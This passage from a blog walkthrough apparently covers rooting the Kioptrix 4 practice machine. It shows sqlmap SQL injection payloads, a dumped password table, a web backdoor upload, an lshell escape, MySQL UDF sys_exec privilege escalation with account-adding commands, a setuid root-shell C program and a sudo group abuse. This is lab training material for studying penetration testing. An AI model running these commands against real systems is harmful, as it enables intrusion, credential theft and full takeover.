unset;">sqlmap identified the following injection point(s) with a total of 253 HTTP(s) requests:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=admin&mypassword=-8260' OR 6555=6555#&Submit=Login
 
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: myusername=admin&mypassword=123' OR SLEEP(5)-- UeQF&Submit=Login
---
[02:00:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[02:00:45] [INFO] fetching current user
[02:00:45] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[02:00:45] [INFO] retrieved: root@localhost
current user:    'root@localhost'
[02:00:45] [INFO] fetching current database
[02:00:45] [INFO] retrieved: members
current database:    'members'
[02:00:45] [INFO] testing if current user is DBA
[02:00:45] [INFO] fetching current user
current user is DBA:    True
[02:00:45] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.32.58.187'
 
[*] shutting down at 02:00:45
</pre><p>Dump the <code>members</code> table for usernames and passwords:</p><pre class="md-fences mock-cm md-end-block" lang="">Database: members
Table: members
[2 entries]
+----+----------+-----------------------+
| id | username | password              |
+----+----------+-----------------------+
| 1  | john     | MyNameIsJohn          |
| 2  | robert   | ADGAdsafdfwt4gadfga== |
+----+----------+-----------------------+
 
</pre><p>通过<code>--os-shell</code>写入一个<code>webshell</code>。</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# sqlmap -u http://10.32.58.187/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" -p mypassword --os-shell
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.2.4#stable}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org
 
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
 
[*] starting at 02:09:06
 
[02:09:06] [INFO] resuming back-end DBMS 'mysql' 
[02:09:06] [INFO] testing connection to the target URL
[02:09:06] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=admin&mypassword=-8260' OR 6555=6555#&Submit=Login
 
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: myusername=admin&mypassword=123' OR SLEEP(5)-- UeQF&Submit=Login
---
[02:09:06] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[02:09:06] [INFO] going to use a web backdoor for command prompt
[02:09:06] [INFO] fingerprinting the back-end DBMS operating system
[02:09:06] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
[02:09:08] [INFO] retrieved the web server document root: '/var/www'
[02:09:08] [INFO] retrieved web server absolute paths: '/var/www/checklogin.php'
[02:09:08] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method
[02:09:08] [INFO] the file stager has been successfully uploaded on '/var/www/' - http://10.32.58.187:80/tmpuadle.php
[02:09:08] [WARNING] unable to upload the file through the web file stager to '/var/www/'
[02:09:08] [WARNING] backdoor has not been successfully uploaded through the file stager possibly because the user running the web server process has not write privileges over the folder where the user running the DBMS process was able to upload the file stager or because the DBMS and web server sit on different servers
do you want to try the same method used for the file stager? [Y/n] 
[02:09:09] [INFO] the backdoor has been successfully uploaded on '/var/www/' - http://10.32.58.187:80/tmpbcphh.php
[02:09:09] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> id
do you want to retrieve the command standard output? [Y/n/a] 
command standard output:    'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] 
command standard output:    'www-data'
os-shell> cat checklogin.php
do you want to retrieve the command standard output? [Y/n/a] 
command standard output:
---
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name
</pre><p>但是权限很小。但是得到了数据库的账号密码。</p><h3><a name='header-n10448' class='md-header-anchor '></a>通过SSH连接</h3><p>利用SQL注入得到的用户名密码SSH登录。</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# ssh john@10.32.58.187
The authenticity of host '10.32.58.187 (10.32.58.187)' can't be established.
RSA key fingerprint is SHA256:3fqlLtTAindnY7CGwxoXJ9M2rQF6nn35SFMTVv56lww.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.32.58.187' (RSA) to the list of known hosts.
john@10.32.58.187's password: 
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ id
*** unknown command: id
john:~$ ?
cd  clear  echo  exit  help  ll  lpath  ls
john:~$ help help
Limited Shell (lshell) limited help.
Cheers.
</pre><p>The account is confined by <code>lshell</code>; the permitted commands are:</p><pre class="md-fences mock-cm md-end-block" lang="">cd  clear  echo  exit  help  ll  lpath  ls
</pre><p>Of these, <code>echo</code> is the interesting one. <code>lshell</code> is itself a Python program, and this is the well-known escape from old releases: the argument ends up evaluated as Python, so a call to <code>os.system</code> spawns an unrestricted bash:</p><pre class="md-fences mock-cm md-end-block" lang="">john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$ id
uid=1001(john) gid=1001(john) groups=1001(john)
</pre><p>Still only <code>john</code>'s privileges.</p><h3><a name='header-n10463' class='md-header-anchor '></a>Privilege escalation through MySQL</h3><p>Log in to MySQL with the credentials read from <code>checklogin.php</code> (<code>root</code> with an empty password):</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">john@Kioptrix4:~$ mysql -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 3520
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)
 
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
 
mysql> status;
--------------
mysql  Ver 14.12 Distrib 5.0.51a, for debian-linux-gnu (i486) using readline 5.2
 
Connection id:      3520
Current database:   
Current user:       root@localhost
SSL:            Not in use
Current pager:      stdout
Using outfile:      ''
Using delimiter:    ;
Server version:     5.0.51a-3ubuntu5.4 (Ubuntu)
Protocol version:   10
Connection:     Localhost via UNIX socket
Server characterset:    latin1
Db     characterset:    latin1
Client characterset:    latin1
Conn.  characterset:    latin1
UNIX socket:        /var/run/mysqld/mysqld.sock
Uptime:         1 hour 10 min 47 sec
</pre><p>Try MySQL UDF privilege escalation: a user-defined function backed by a shared library that <code>mysqld</code> loads, which gives command execution with the privileges of the <code>mysqld</code> process. For reference, on Windows the sequence is (the DLL is loaded into a table, dumped into the system directory, registered as <code>sys_exec</code>, and used to add an administrator):</p><pre class="md-fences mock-cm md-end-block" lang="">USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_file('C://xampplite//htdocs//mail//lib_mysqludf_sys.dll'));
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");
</pre><p>On this Linux target the Linux build of the same library, <code>lib_mysqludf_sys.so</code>, is already installed. Locate it first:</p><pre class="md-fences mock-cm md-end-block" lang="">john@Kioptrix4:~$ whereis lib_mysqludf_sys.so
lib_mysqludf_sys: /usr/lib/lib_mysqludf_sys.so
</pre><p>Then register and call <code>sys_exec</code> from the MySQL client, redirecting the command's output to a file and handing it to <code>john</code> so it can be read afterwards:</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">mysql> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
 
Database changed
mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
ERROR 1125 (HY000): Function 'sys_exec' already exists
mysql> select sys_exec('id > /tmp/out; chown john.john /tmp/out');
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
Connection id:    1
Current database: mysql
 
+-----------------------------------------------------+
| sys_exec('id > /tmp/out; chown john.john /tmp/out') |
+-----------------------------------------------------+
| NULL                                                | 
+-----------------------------------------------------+
1 row in set (0.00 sec)
 
mysql> quit
Bye
john@Kioptrix4:~$ cat /tmp/out
uid=0(root) gid=0(root)
</pre><p><code>sys_exec</code> is already registered (<code>CREATE FUNCTION</code> reports that it exists), and the output redirected to <code>/tmp/out</code> shows the command ran as <code>uid=0</code>: <code>mysqld</code> itself runs as root. The <code>MySQL server has gone away</code> error is a side effect of the UDF call; the command still executes.</p><p>One way to turn this into a shell is a small C program that sets its IDs to 0 and spawns bash. Compiled locally and copied to the target, it would then be chowned to root and marked setuid through <code>sys_exec</code>:</p><pre class="md-fences mock-cm md-end-block" lang="">#include <stdio.h>
#include <stdlib.h>     /* system() */
#include <sys/types.h>
#include <unistd.h>     /* setuid(), setgid() */

/* Meant to be owned by root with the setuid bit set (chown root:root; chmod 4755),
   e.g. through sys_exec(), so that bash starts with real and effective uid 0. */
int main(void)
{
    setuid(0);
    setgid(0);
    system("/bin/bash");
    return 0;
}
</pre><p>Compile it locally and upload it to the target. Here the <code>wget</code> download timed out, possibly because a firewall blocks the traffic, so a shorter route was taken instead:</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">mysql> SELECT sys_exec('usermod -a -G admin');
ERROR 2013 (HY000): Lost connection to MySQL server during query
mysql> SELECT sys_exec('usermod -a -G admin john');
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
Connection id:    1
Current database: mysql
 
+--------------------------------------+
| sys_exec('usermod -a -G admin john') |
+--------------------------------------+
| NULL                                 | 
+--------------------------------------+
1 row in set (0.07 sec)
 
</pre><p><code>sys_exec('usermod -a -G admin john')</code> adds <code>john</code> to the <code>admin</code> group (the first attempt, without the username, fails). On Ubuntu 8.04 the default sudoers file grants <code>%admin</code> full sudo, so <code>john</code> can now become root with his own password:</p><pre class="md-fences mock-cm md-end-block" lang="">john@Kioptrix4:/tmp$ sudo su
[sudo] password for john: 
root@Kioptrix4:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix4:/tmp# whoami
root
</pre><p>That gives a root shell.</p></div>
</body>
</html>

  

 

posted @ 2019-07-25 15:21  xyongsec